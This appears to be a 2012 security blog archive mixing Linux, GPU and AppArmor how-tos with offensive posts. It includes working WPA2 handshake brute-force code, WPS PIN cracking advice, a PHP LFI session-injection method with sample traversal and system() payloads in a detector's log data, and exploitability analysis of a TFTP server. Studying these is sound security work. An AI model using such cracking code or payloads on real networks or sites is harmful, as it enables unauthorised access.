Wednesday, October 24, 2012

HOWTO : Activate nVidia GeForce GT650M on 15" MacBook Pro Retina

Two pieces of software are needed: gfxCardStatus and the nVidia CUDA driver for Mac.

gfxCardStatus switches to the nVidia GT650M automatically when the running program needs 3D acceleration (VirtualBox, for example); you can also switch manually.

The CUDA driver is loaded automatically when a program uses CUDA.

That's all! See you.

Tuesday, October 16, 2012

HOWTO : nVidia Optimus on Back|Track 5 r3

(A) Hardware (nVidia Optimus)

Brand : Asus n82jv-vx072v
CPU : Intel i5 450M, 2.4Ghz
RAM : 4096MB DDR3 1066
Display card : nVidia GeForce GT335M 1G VRAM DDR3

(B) Hardware (nVidia GeForce)

Any computer with a CUDA-capable nVidia GeForce display card.

Problem

You get a black screen at boot and cannot get any further to install Back|Track. This tutorial applies not only to Back|Track but to other Linux distributions as well.

Solution

Step 1 :

In the "Boot Option Menu" press "Tab" (other Linux distributions differ) and append the following to the end of the kernel option line :

text splash vga=791 i915.modeset=1 nomodeset

*** Remarks : "i915.modeset=1 nomodeset" is for Optimus only. For a plain nVidia GeForce card, "nomodeset" alone is enough.

Step 2 :

Once the installation has finished, do not reboot yet; stay in the live session. Mount the installed root filesystem and chroot into it (otherwise update-grub acts on the live system rather than the one you just installed), then edit :

nano /etc/default/grub

Locate the line 'GRUB_CMDLINE_LINUX_DEFAULT="text splash vga=791"' and add the same parameters you used at boot, so that it reads :

GRUB_CMDLINE_LINUX_DEFAULT="text splash vga=791 i915.modeset=1 nomodeset"

update-grub

The following command is for Back|Track only.

fix-splash

Step 3 :

Reboot your computer.

Step 4 (alternative to Step 4a; do only one of them) :

Do not run "startx": this step is done outside X. On other Linux distributions switch to a text console with Ctrl + Alt + F2.

Download the CUDA 5.0 installer for your architecture (64-bit or 32-bit) :

wget http://developer.download.nvidia.com/compute/cuda/5_0/rel/installers/cuda_5.0.35_linux_64_ubuntu10.04.run

wget http://developer.download.nvidia.com/compute/cuda/5_0/rel/installers/cuda_5.0.35_linux_32_ubuntu10.04.run

The file is fetched over plain HTTP and you are about to run it as root, so compare its checksum with the value nVidia publishes for that release before going on. Then make it executable and run it (64-bit shown; use the _32_ file name for 32-bit) :

chmod +x cuda_5.0.35_linux_64_ubuntu10.04.run
./cuda_5.0.35_linux_64_ubuntu10.04.run

Answer "accept" and install both the nVidia driver (304.54 at the time of writing) and the CUDA Toolkit (5.0.35). Install the samples if you want them. Press Enter at every path prompt to accept the defaults.

Remarks : a newer CUDA release may be available; adjust the file names accordingly.

Step 4a (alternative to Step 4; do only one of them) :

Do not run "startx": this step is done outside X. On other Linux distributions switch to a text console with Ctrl + Alt + F2.

The x-swat PPA (ppa:ubuntu-x-swat/x-updates) originally used here no longer works; install the driver from the Back|Track repositories instead :

apt-get update
apt-get install nvidia-current nvidia-current-modaliases nvidia-settings

The nVidia driver (304.60 at the time of writing) is now installed.

Download the CUDA 5.0 installer for your architecture, exactly as in Step 4, and check its checksum before running it :

wget http://developer.download.nvidia.com/compute/cuda/5_0/rel/installers/cuda_5.0.35_linux_64_ubuntu10.04.run

wget http://developer.download.nvidia.com/compute/cuda/5_0/rel/installers/cuda_5.0.35_linux_32_ubuntu10.04.run

chmod +x cuda_5.0.35_linux_64_ubuntu10.04.run
./cuda_5.0.35_linux_64_ubuntu10.04.run

Answer "accept" but DO NOT install the nVidia driver this time; install only the CUDA Toolkit (5.0.35), plus the samples if you want them. Press Enter at every path prompt to accept the defaults.

Remarks : a newer CUDA release may be available; adjust the file names accordingly.

Step 5 :

The following is for Back|Track, which runs everything as root. On other Linux distributions edit the .bashrc of the user concerned instead of /root/.bashrc.

nano /root/.bashrc

Append the following (/lib is searched by the dynamic linker anyway and does not need to be listed) :

PATH=$PATH:/usr/local/cuda-5.0/bin
LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/cuda-5.0/lib:/usr/local/cuda-5.0/lib64
export PATH
export LD_LIBRARY_PATH

Alternatively, on any Linux distribution, register the CUDA libraries with the dynamic linker instead of setting LD_LIBRARY_PATH. ld.so.conf takes library directories only, so the bin directory does not belong in it; you still need the PATH lines above for the CUDA tools.

nano /etc/ld.so.conf.d/cuda.conf

/usr/local/cuda-5.0/lib
/usr/local/cuda-5.0/lib64

Save and then run the following command :

ldconfig

Then reboot (or at least log in again so that the new environment is picked up).

Step 6 : (For nVidia Optimus only)

To install Bumblebee :

sudo add-apt-repository ppa:bumblebee/stable

sudo apt-get update

sudo apt-get install bumblebee bumblebee-nvidia

Then, reboot the box.

Step 7 : (For nVidia Optimus only)

To check whether the nVidia driver works, run the test program with and without optirun; the optirun run should report the nVidia GPU as the OpenGL renderer :

glxspheres

optirun glxspheres

Step 8 : (Optional)

Go to the official site of pyrit :

http://code.google.com/p/pyrit/downloads/list

Download pyrit and cpyrit-cuda (version 0.4.0 at the time of writing). Back|Track 5 r3 may ship pyrit already, but without CUDA support.

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
python setup.py install

tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
python setup.py install

To check that the installation is correct (drop "optirun" if you are not on Optimus) :

optirun pyrit list_cores
optirun pyrit benchmark
optirun pyrit benchmark_long

Finally, thanks to Malko for testing this and confirming that it works.

That's all! See you.

Saturday, October 13, 2012

HOWTO : Cracking WPA2 Passpharse Made Easy

Many people still think that cracking a WPA2 passphrase requires a dictionary. That is not so.

You can brute-force the WPA2 passphrase with the help of GPUs. Here are my findings from April 16, 2010 and May 22, 2011.
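What a GPU cracker actually repeats for every candidate passphrase is the WPA2-PSK key derivation plus a MIC check against the captured 4-way handshake. The following is an added example (not the author's code, and not a real capture): the "password"/"IEEE" vector is the one published in IEEE 802.11i Annex H, while the SSID, MAC addresses, nonces, candidate list and EAPOL frame are constructed here for the demonstration.

```python
"""WPA2-PSK key derivation and handshake MIC check, the computation a GPU
cracker repeats per candidate passphrase.

Added example for the post above; it is not the author's code. The access
point/station addresses, nonces and EAPOL frame below are constructed for
the demonstration (no real capture), and the "password"/"IEEE" vector is the
one published in IEEE 802.11i Annex H.
"""
import hashlib
import hmac


def pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    Those 4096 iterations are the whole cost of one brute-force attempt."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


# Published test vector from IEEE 802.11i Annex H.4.1.
IEEE_VECTOR_PMK = bytes.fromhex(
    "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")


def check_test_vector():
    return pmk("password", "IEEE") == IEEE_VECTOR_PMK


def prf512(key, label, data):
    """802.11i PRF-512: four HMAC-SHA1 blocks over label || 0x00 || data || i."""
    out = b""
    for i in range(4):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def kck_from_handshake(pmk_bytes, ap_mac, sta_mac, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces));
    the first 16 bytes are the KCK that authenticates the EAPOL-Key frames."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk_bytes, b"Pairwise key expansion", data)[:16]


MIC_OFFSET = 81  # Key MIC field position inside an EAPOL-Key frame


def eapol_mic(kck, eapol):
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    frame = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, frame, hashlib.sha1).digest()[:16]


def crack(candidates, ssid, ap_mac, sta_mac, anonce, snonce, eapol):
    """Return the candidate whose derived KCK reproduces the captured MIC, else None."""
    captured = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for cand in candidates:
        kck = kck_from_handshake(pmk(cand, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, eapol), captured):
            return cand
    return None


# --- constructed demonstration data (not a real capture) ---
SSID = "demo-net"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
TRUE_PASSPHRASE = "correct horse"
CANDIDATES = ["password", "12345678", "correct horse", "letmein1"]


def build_demo_eapol():
    """Second handshake message: header/body bytes are placeholders, the MIC is real."""
    frame = bytearray(99)
    frame[0:4] = b"\x01\x03\x00\x5f"   # EAPOL v1, type Key, body length 95
    frame[4] = 2                         # RSN key descriptor
    frame[5:7] = b"\x01\x0a"             # key info: MIC set, pairwise, version 2
    frame[17:49] = SNONCE                # key nonce
    kck = kck_from_handshake(pmk(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    frame[MIC_OFFSET:MIC_OFFSET + 16] = eapol_mic(kck, bytes(frame))
    return bytes(frame)


if __name__ == "__main__":
    print("test vector ok:", check_test_vector())
    print("recovered:", crack(CANDIDATES, SSID, AP_MAC, STA_MAC,
                              ANONCE, SNONCE, build_demo_eapol()))
```

Everything but the PBKDF2 step is cheap; the 4096 HMAC-SHA1 iterations per candidate are what a GPU parallelises, and nothing in the derivation depends on the router being online, which is why an offline brute force works once a single handshake has been captured.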



If the wifi router supports WPS (Wi-Fi Protected Setup) and it is enabled, cracking it is very easy with the tool reaver: it brute-forces the 8-digit WPS PIN, which the router checks in two halves, so at most about 11,000 attempts are needed, and the router then hands over the WPA2 passphrase. Disable WPS on your own router.



In addition, using public wifi, free or not, is risky whether or not it has a passphrase (see "See Also" for details). Be aware too that high-power, long-range wifi adapters are on the market.

Alfa Network makes some of them, such as the Alfa AWUS036H and Alfa AWUS036NHR; they can connect to the victim's wifi router from more than 1 km away.

That's all! See you.

See Also :

HOWTO : Sniffing SSL with ettercap on Back|Track 5

HOWTO : Protect you from being ARP spoofing

Wednesday, October 03, 2012

EXPLOIT-DEV : CentOS 6.3 vs Ubuntu 12.04

There are many ways to exploit a Local File Inclusion (LFI) vulnerability in a PHP web application on Linux: /proc (process) injection, log file injection, session file injection and so on. Some of them, I think, no longer work on the latest Linux distributions.

In my recent research, however, I found that on CentOS 6.3 (and perhaps earlier versions) the PHP session files can be injected and loaded with the default settings, whereas on Ubuntu 12.04 they cannot. (Remarks : I did not check other Linux distributions.) The session file is named sess_ followed by the value of the PHPSESSID cookie and lives in session.save_path (/var/lib/php/session by default on CentOS, /var/lib/php5 on Ubuntu), so an attacker who gets PHP code stored in $_SESSION through any page that saves user input knows exactly which file to include.

When session files can be injected and loaded through an LFI vulnerability, the attacker obtains a remote shell.

CentOS is a rebuild of Red Hat Enterprise Linux, so the same presumably applies to RHEL 6.3.
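The attack leaves a recognisable trail in the web server's access log: a traversal path or session-file path in an include parameter, and, one request earlier, PHP tags in whatever parameter the application copies into the session. The following detector is an added example (not the author's code); it assumes the Apache "combined" log format, the SESSION_DIRS list holds the default session.save_path values mentioned above, and the log lines at the bottom are constructed for the demonstration.

```python
"""Detection side of the LFI / session-file injection described above: scan
web-server access log lines for traversal, PHP session-file paths, stream
wrappers and PHP tags in request parameters.

Added example, not the author's code. Apache "combined" log format is assumed,
SESSION_DIRS holds the default session.save_path values the post refers to
(CentOS and Debian/Ubuntu) plus /tmp, and the log lines at the bottom are
constructed for the demonstration.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')

SESSION_DIRS = ("/var/lib/php/session/", "/var/lib/php5/", "/tmp/")


def classify(target):
    """Return the reasons a request target looks like an LFI attempt (empty if clean)."""
    reasons = []
    query = urlsplit(target).query
    for key, raw in parse_qsl(query, keep_blank_values=True):
        val = unquote(raw)  # parse_qsl decoded once; this catches double encoding
        if "../" in val or "..\\" in val or "\x00" in val:
            reasons.append("traversal or null byte in '%s'" % key)
        if "sess_" in val and any(d in val for d in SESSION_DIRS):
            reasons.append("PHP session file path in '%s'" % key)
        if val.lower().startswith(("php://", "data:", "expect://", "zip://", "phar://")):
            reasons.append("PHP stream wrapper in '%s'" % key)
        if "<?php" in val or "<?=" in val:
            reasons.append("PHP code in '%s' (session poisoning attempt)" % key)
    return reasons


def scan(lines):
    """Return (client ip, request target, reasons) for every suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify(m.group("target"))
        if reasons:
            hits.append((m.group("ip"), m.group("target"), reasons))
    return hits


# Constructed log lines: one clean request, then the three steps of the attack.
SAMPLE_LOG = [
    '10.0.0.5 - - [03/Oct/2012:10:00:01 +0800] "GET /index.php?page=about HTTP/1.1" '
    '200 1024 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [03/Oct/2012:10:00:07 +0800] "GET /index.php?page=../../../../etc/passwd '
    'HTTP/1.1" 200 2048 "-" "curl/7.26"',
    '10.0.0.9 - - [03/Oct/2012:10:00:09 +0800] "GET /search.php?q=%3C%3Fphp+system%28%24_GET'
    '%5Bc%5D%29%3B+%3F%3E HTTP/1.1" 200 300 "-" "curl/7.26"',
    '10.0.0.9 - - [03/Oct/2012:10:00:11 +0800] "GET /index.php?page=../../../../var/lib/php/'
    'session/sess_abc123&c=id HTTP/1.1" 200 512 "-" "curl/7.26"',
]

if __name__ == "__main__":
    for ip, target, reasons in scan(SAMPLE_LOG):
        print(ip, target, "; ".join(reasons))
```

The PHP-tag check is the useful early signal: the poisoning request itself is harmless-looking and hits an ordinary page, and only the later include request carries the session path.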

Reference : Web vulnerabilities to gain access to the system

That's all! See you.

Sunday, September 30, 2012

HOWTO : Web Application Attack

The following tutorials were written by Prateek Gianchandani, whose interests are penetration testing, web application security and intrusion detection. He is currently a researcher at InfoSec Institute and has worked for security start-ups in the past. In his spare time he maintains his website searching-eye.com.

Burp Suite Walkthrough

Inserting Vulnerabilities in Web Applications

Hacking Web Authentication – Part 1

Hacking Web Authentication – Part 2

W3af walkthrough and tutorial – Part 1

w3af walkthrough and tutorial part 2 – Discovery and Audit plugins

w3af walkthrough and tutorial part 3 – Remaining plugins

w3af walkthrough and tutorial part 4 – w3af tools, profiles and scripting

That's all! See you.

HOWTO : SQLi Lab Series by Audi-1

The following SQLi Lab was created by Audi-1, an Offensive Security Certified Expert (OSCE), who explains how SQL injection works.

SQLi Lab Series - Introduction

SQLi Lab Series - Error Based

SQLi Lab Series - Double Query / SubQuery

SQLi Lab Series - Blind Injection - Boolean Based

SQLi Lab Series - Blind Injection - Time Based

SQLi Lab Series - Using Outfile / Dumpfile

SQLi Lab Series - Post Based

SQLi Lab Series - Double Query

SQLi Lab Series - Update Query

SQLi Lab Series - Insert Query / Headers

SQLi Lab Series - Cookie Based

Second Order Injection

Bypassing blacklist filters (Part 1)

Bypassing blacklist filters (Part 2)

The whole series of the video of SQLi Lab Series

That's all! See you.

Wednesday, September 26, 2012

Course Review - Cracking the Perimeter (CTP)

Before you can enroll in Cracking the Perimeter you have to solve a challenge that confirms you have the prerequisite skills; the course is not designed for newbies.

If you have no penetration testing knowledge, I recommend taking Penetration Testing with BackTrack first.

The Course

Windows debuggers are used for most of the course, for anti-virus bypass, backdooring and exploit writing. You should already know some x86 assembly, Linux, Windows and web scripting languages such as PHP. You are also expected to do a lot of research on exploit writing, and extra exercises to sharpen your skills are recommended. The course also covers web application attacks.

The module I like most and hate most is the HP OpenView Network Node Manager (NNM) 7.5.0 one. At first I overlooked it, thinking it was a very specific case whose solution would not carry over to other exploit writing. Later I found it very interesting and spent a lot of time understanding what is going on. Fortunately, in the end I fully understand it.

Mati (the founder of Offensive Security) gave a talk at DefCon 16 about writing this exploit, in which he says he could not solve it at first. Here it is :



You should book the exam within 90 days after your lab access expires; otherwise you have to pay for the exam.

The Challenge

The challenge gives you 47 hours and 45 minutes to solve a series of problems. You must submit the report within 24 hours after the challenge ends.

Finally the exam was over and the report submitted. Within 3 business days I received an email telling me that I had passed the challenge. I am now an Offensive Security Certified Expert (OSCE).

The Conclusion

In conclusion, this course will teach you about exploit writing and some skills of AV bypass and backdooring. You need to have some skills on Penetration Testing before taking this course. This course is an eye-opener, you can learn a lot of things during the course. Make sure you fully understand the course materials. Recommended!

Tuesday, September 04, 2012

HOWTO : Apparmor for VirtualBox on Ubuntu 12.04

AppArmor is a mandatory access control (MAC) system that confines each program with its own profile; it serves the same purpose as SELinux and is installed by default on Ubuntu.

There is no AppArmor profile for VirtualBox in /etc/apparmor.d/, so you have to write your own. Copy the following profile into that directory and enable it.

Step 1 :

sudo apt-get install apparmor-utils

Make sure Virtualbox is installed.

Step 2 :

usr.bin.VBox



Copy the profile above into /etc/apparmor.d/ and save it under the file name usr.bin.VBox.

Step 3 :

Load the profile in complain mode first (aa-complain), run VirtualBox and look for apparmor="DENIED" lines in the kernel log; once nothing legitimate is denied, switch it to enforce mode :

sudo aa-enforce /etc/apparmor.d/usr.bin.VBox

That's all! See you.

REFERENCE

Apparmor manual for Ubuntu

HOWTO : Apparmor for xChat on Ubuntu 12.04

AppArmor is a mandatory access control (MAC) system that confines each program with its own profile; it serves the same purpose as SELinux and is installed by default on Ubuntu.

There is no AppArmor profile for xChat in /etc/apparmor.d/, so you have to write your own. Copy the following profile into that directory and enable it.

Step 1 :

sudo apt-get install apparmor-utils
sudo apt-get install xchat

Step 2 :

usr.bin.xchat



Make sure lines #19, #34 and #36 match the installed Python version. If you upgrade Python, change them accordingly; otherwise xChat will not start because AppArmor blocks it.

Copy the profile above into /etc/apparmor.d/ and save it under the file name "usr.bin.xchat".

Step 3 :

After making the changes (if any), test the profile in complain mode (aa-complain) first, then enable it :

sudo aa-enforce /etc/apparmor.d/usr.bin.xchat
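When a hand-written profile like the two above blocks the program, the fix comes from the kernel log: every apparmor="DENIED" line names the profile, the path or capability and the access that was refused. The following is an added example (not the author's code) that turns such lines into candidate rules; load the profile with aa-complain, exercise the program, then feed the DENIED lines from /var/log/syslog or /var/log/kern.log to it. The log lines at the bottom are constructed, and the translation covers file, capability and network denials only.

```python
"""Turn AppArmor "DENIED" audit lines into candidate profile rules, the step
you repeat when a new profile (like the ones above) blocks the program.

Added example, not the author's code. Load the profile in complain mode first
(aa-complain), exercise the program, then feed the kernel-log lines in; the
lines at the bottom are constructed for the demonstration, and the rule
translation covers file, capability and network denials only.
"""
import re
from collections import defaultdict

KV_RE = re.compile(r'(\w+)="([^"]*)"|(\w+)=(\S+)')
PYTHON_DIR_RE = re.compile(r"/python\d\.\d/")


def parse_denial(line):
    """Return the key=value fields of one DENIED line, or None for other lines."""
    if 'apparmor="DENIED"' not in line:
        return None
    fields = {}
    for m in KV_RE.finditer(line):
        if m.group(1) is not None:
            fields[m.group(1)] = m.group(2)
        else:
            fields[m.group(3)] = m.group(4)
    return fields


def file_perms(mask):
    """Map a requested_mask to profile permission letters: create/delete need 'w',
    exec gets the conservative 'ix' (run under the same profile)."""
    letters = set(mask.replace("c", "w").replace("d", "w"))
    perms = "".join(ch for ch in "rwamkl" if ch in letters)
    if "x" in letters:
        perms += "ix"
    return perms


def suggest_rule(fields, generalize_python=False):
    """One profile rule for a denial, or None if the operation is not handled."""
    op = fields.get("operation", "")
    if op == "capable":
        return "capability %s," % fields.get("capname", "?")
    if "family" in fields and "sock_type" in fields:
        return "network %s %s," % (fields["family"], fields["sock_type"])
    if "name" in fields and "requested_mask" in fields:
        path = fields["name"]
        if generalize_python:  # survive a Python minor-version upgrade
            path = PYTHON_DIR_RE.sub("/python[0-9].[0-9]/", path)
        return "%s %s," % (path, file_perms(fields["requested_mask"]))
    return None


def rules_by_profile(lines, generalize_python=False):
    """Group suggested rules by confined profile, deduplicated and sorted."""
    rules = defaultdict(set)
    for line in lines:
        fields = parse_denial(line)
        if not fields:
            continue
        rule = suggest_rule(fields, generalize_python)
        if rule:
            rules[fields.get("profile", "?")].add(rule)
    return {profile: sorted(r) for profile, r in rules.items()}


# Constructed kernel-log lines in the Ubuntu 12.04-era format.
SAMPLE_LOG = [
    'Sep  4 10:12:33 host kernel: [ 1234.567890] type=1400 audit(1346731953.123:45): '
    'apparmor="DENIED" operation="open" parent=1 profile="/usr/bin/xchat" '
    'name="/usr/lib/python2.7/site.py" pid=2345 comm="xchat" requested_mask="r" '
    'denied_mask="r" fsuid=1000 ouid=0',
    'Sep  4 10:12:34 host kernel: [ 1235.000001] type=1400 audit(1346731954.001:46): '
    'apparmor="DENIED" operation="exec" parent=2345 profile="/usr/bin/xchat" '
    'name="/bin/dash" pid=2400 comm="xchat" requested_mask="x" denied_mask="x" '
    'fsuid=1000 ouid=0',
    'Sep  4 10:12:35 host kernel: [ 1236.000002] type=1400 audit(1346731955.002:47): '
    'apparmor="DENIED" operation="create" parent=1 profile="/usr/bin/xchat" pid=2345 '
    'comm="xchat" family="inet" sock_type="stream" protocol=6',
    'Sep  4 10:13:01 host kernel: [ 1262.000003] type=1400 audit(1346731981.003:48): '
    'apparmor="DENIED" operation="capable" parent=1 profile="/usr/bin/VBox" pid=3000 '
    'comm="VirtualBox" capability=21 capname="sys_admin"',
    'Sep  4 10:13:02 host kernel: [ 1263.000004] type=1400 audit(1346731982.004:49): '
    'apparmor="STATUS" operation="profile_load" name="/usr/bin/xchat" pid=3100 '
    'comm="apparmor_parser"',
]

if __name__ == "__main__":
    for profile, rules in rules_by_profile(SAMPLE_LOG, generalize_python=True).items():
        print(profile)
        for rule in rules:
            print("  " + rule)
```

Treat the output as a starting point, not something to paste blindly: an exec denial on a shell, or a capability such as sys_admin, is exactly the kind of access a profile exists to refuse, so decide per rule whether the program really needs it. The generalize_python option addresses the Python-version lines mentioned above by turning /usr/lib/python2.7/ into a glob that still matches after an upgrade.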

That's all! See you.

REFERENCE

Apparmor manual for Ubuntu

HOWTO : Apparmor for Firefox on Ubuntu 12.04

AppArmor is a mandatory access control (MAC) system that confines each program with its own profile; it serves the same purpose as SELinux and is installed by default on Ubuntu.

The AppArmor profile for Firefox is already shipped in /etc/apparmor.d/ but is disabled by default (Ubuntu keeps a symlink to it in /etc/apparmor.d/disable/; aa-enforce removes that link).

Step 1 :

sudo apt-get install apparmor-utils

Step 2 :



Make sure lines #120 to #127 match the language installed on your Ubuntu. Lines #122 to #123 and #126 to #127 carry the Traditional Chinese names of the Public and Downloads directories.

Step 3 :

After making the changes (if any), then enable it.

sudo aa-enforce /etc/apparmor.d/usr.bin.firefox

That's all! See you.

REFERENCE

Apparmor manual for Ubuntu

Wednesday, August 22, 2012

EXPLOIT-DEV : Quick TFTP Server Pro 2.1 Case Study

Quick TFTP Server Pro is a multi-threaded TFTP and Telnet server for Microsoft Windows. It is designed to let network administrators and users save and write files from various network equipment, and to let users log in to the server and run commands such as listing file and directory information or pinging network equipment.

The current version, 2.1, is vulnerable to a buffer overflow announced on March 26, 2008 and to a directory traversal announced on November 5, 2011.

I only look at the buffer overflow here. The vendor has not fixed it since it was discovered in 2008, and I wanted to know why.

So I decided to investigate. It turns out that the software is only exploitable on Windows XP SP2 and below; Windows XP SP3 and later cannot be exploited even though the bug is present. Why?

The program is a standalone executable that ships with no DLL of its own. From Windows XP SP3 on, Data Execution Prevention (DEP) enforces non-executable pages on the stack, which stops the injected shellcode from running. (Note that XP's default DEP policy is OptIn, which covers Windows system binaries and services; a third-party executable is only protected when the policy is set to OptOut or AlwaysOn.)

In addition, the program loads no module (DLL) that was compiled without SafeSEH, and all the system modules are SafeSEH-protected. You can find a usable pointer in unicode.nls, but its address contains a null byte, so there is no way to get the shellcode to run.

That is as far as I have got. If anyone finds a way to exploit this software on Windows XP SP3 or later, please let me know. I have not tried the ret2libc or ROP approaches yet.

So it only affects Windows XP SP2 and below, and since XP SP2 is no longer supported by Microsoft, I think the developer sees no need to fix the vulnerability.
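The two properties that decided this case, whether a loaded module has SafeSEH and whether its addresses contain a null byte, can be read straight from the PE headers. The following is an added example (not the author's code) that checks a PE32 module for a SafeSEH handler table in the Load Config directory, the NO_SEH, NX_COMPAT and DYNAMIC_BASE flags, and a null high byte in the image base. The PE image at the bottom is constructed in memory for the demonstration, not a real binary; on Windows XP, DEP coverage for a third-party executable is a system policy rather than a per-binary flag, so NX_COMPAT is reported for completeness and only matters on Vista and later.

```python
"""Check a PE32 module for the protections the post runs into: SafeSEH (a
handler table in the Load Config directory), the NO_SEH, NX_COMPAT and
DYNAMIC_BASE flags, and whether addresses in the module carry a null byte.

Added example, not the author's code. On Windows XP, DEP coverage for a
third-party executable is a system policy (OptIn by default), not a per-binary
flag; NX_COMPAT only matters on Vista and later. The PE image at the bottom is
constructed in memory for the demonstration, not a real binary.
"""
import struct
import sys

DYNAMIC_BASE = 0x0040   # IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE
NX_COMPAT = 0x0100      # IMAGE_DLLCHARACTERISTICS_NX_COMPAT
NO_SEH = 0x0400         # IMAGE_DLLCHARACTERISTICS_NO_SEH
LOAD_CONFIG = 10        # IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG


def _u16(b, off):
    return struct.unpack_from("<H", b, off)[0]


def _u32(b, off):
    return struct.unpack_from("<I", b, off)[0]


def rva_to_offset(sections, rva):
    """Map an RVA to a file offset through the section table."""
    for vaddr, vsize, raw_ptr, raw_size in sections:
        if vaddr <= rva < vaddr + max(vsize, raw_size):
            return raw_ptr + (rva - vaddr)
    raise ValueError("RVA 0x%x is outside every section" % rva)


def check_module(data):
    if data[:2] != b"MZ":
        raise ValueError("not a PE file")
    pe = _u32(data, 0x3C)                       # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    fh = pe + 4                                 # IMAGE_FILE_HEADER
    nsec, opt_size = _u16(data, fh + 2), _u16(data, fh + 16)
    opt = fh + 20                               # IMAGE_OPTIONAL_HEADER32
    if _u16(data, opt) != 0x10B:
        raise ValueError("only PE32 is handled here")
    image_base = _u32(data, opt + 28)
    dllchar = _u16(data, opt + 70)
    ndirs = _u32(data, opt + 92)
    sections = []
    for i in range(nsec):
        s = opt + opt_size + i * 40             # IMAGE_SECTION_HEADER
        sections.append((_u32(data, s + 12), _u32(data, s + 8),
                         _u32(data, s + 20), _u32(data, s + 16)))
    safeseh = False
    if ndirs > LOAD_CONFIG:
        lc_rva = _u32(data, opt + 96 + LOAD_CONFIG * 8)
        lc_size = _u32(data, opt + 96 + LOAD_CONFIG * 8 + 4)
        if lc_rva and lc_size >= 72:            # SEHandlerTable/Count at 0x40/0x44
            lc = rva_to_offset(sections, lc_rva)
            safeseh = _u32(data, lc + 64) != 0 and _u32(data, lc + 68) != 0
    return {
        "safeseh": safeseh,
        "no_seh": bool(dllchar & NO_SEH),
        "nx_compat": bool(dllchar & NX_COMPAT),
        "aslr": bool(dllchar & DYNAMIC_BASE),
        # every address inside a module based below 0x01000000 starts with 0x00
        "null_high_byte": (image_base >> 24) == 0,
    }


def usable_for_seh_overwrite(info):
    """A POP/POP/RET from this module only works when it has neither SafeSEH nor
    NO_SEH, and its addresses carry no null byte (which would truncate the copy)."""
    return not info["safeseh"] and not info["no_seh"] and not info["null_high_byte"]


def build_sample_pe(with_safeseh, dllchar, image_base=0x00400000):
    """Minimal PE32 image with one section and a Load Config entry (constructed data)."""
    sec_rva, sec_off, opt_size = 0x1000, 0x400, 224
    img = bytearray(sec_off + 0x1000)
    img[:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)
    pe = 0x80
    img[pe:pe + 4] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", img, pe + 4, 0x14C, 1, 0, 0, 0, opt_size, 0x102)
    opt = pe + 24
    struct.pack_into("<H", img, opt, 0x10B)
    struct.pack_into("<I", img, opt + 28, image_base)
    struct.pack_into("<H", img, opt + 70, dllchar)
    struct.pack_into("<I", img, opt + 92,16)
    struct.pack_into("<II", img, opt + 96 + LOAD_CONFIG * 8, sec_rva + 0x100, 72)
    sec = opt + opt_size
    img[sec:sec + 8] = b".text\0\0\0"
    struct.pack_into("<IIII", img, sec + 8, 0x1000, sec_rva, 0x1000, sec_off)
    lc = sec_off + 0x100                        # file offset of the Load Config block
    struct.pack_into("<I", img, lc, 72)
    if with_safeseh:
        struct.pack_into("<II", img, lc + 64, image_base + sec_rva + 0x200, 1)
    return bytes(img)


if __name__ == "__main__":
    with open(sys.argv[1], "rb") as f:
        print(check_module(f.read()))
```

Run it over the executable and every DLL in the process; a module is only a candidate for an SEH overwrite when usable_for_seh_overwrite() is true, which is the same test mona's module listing applies by hand. The executable itself, based at 0x00400000, fails the null-byte test even before SafeSEH is considered.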

That's all! See you.

Thursday, August 16, 2012

HOWTO : Back|Track 5 r3 on Gigabyte TouchNote T1028X/M1028

The Gigabyte TouchNote T1028X/M1028 has an Intel Atom N280 and an eGalax touch screen. Back|Track 5 r3 runs on it flawlessly except for the touchpad; this tutorial shows how to get around that.

Back|Track 5 r3 ships kernel 3.2.6, and the touch screen works flawlessly with it.

Touchscreen Hardware

"lsusb" shows the following :

Bus 005 Device 002: ID 0eef:0001 D-WAV Scientific Co., Ltd eGalax TouchScreen

Step 1 :

Boot the 32-bit Back|Track 5 r3 from a USB stick made with UNetbootin or from DVD. On the boot menu press "Tab" and append the following to the end of the line :

i8042.noloop=1 reboot=b

Then install as usual and then reboot.

Step 2 :

After login, enter the following :

nano /etc/default/grub

Append "i8042.noloop=1 reboot=b" to "GRUB_CMDLINE_LINUX_DEFAULT".

It will look like this :

GRUB_CMDLINE_LINUX_DEFAULT="quiet splash i8042.noloop=1 reboot=b"

Save and exit.

Then execute the following commands :

update-grub
fix-splash


Then power off the computer and switch it on again.

That's all! See you.

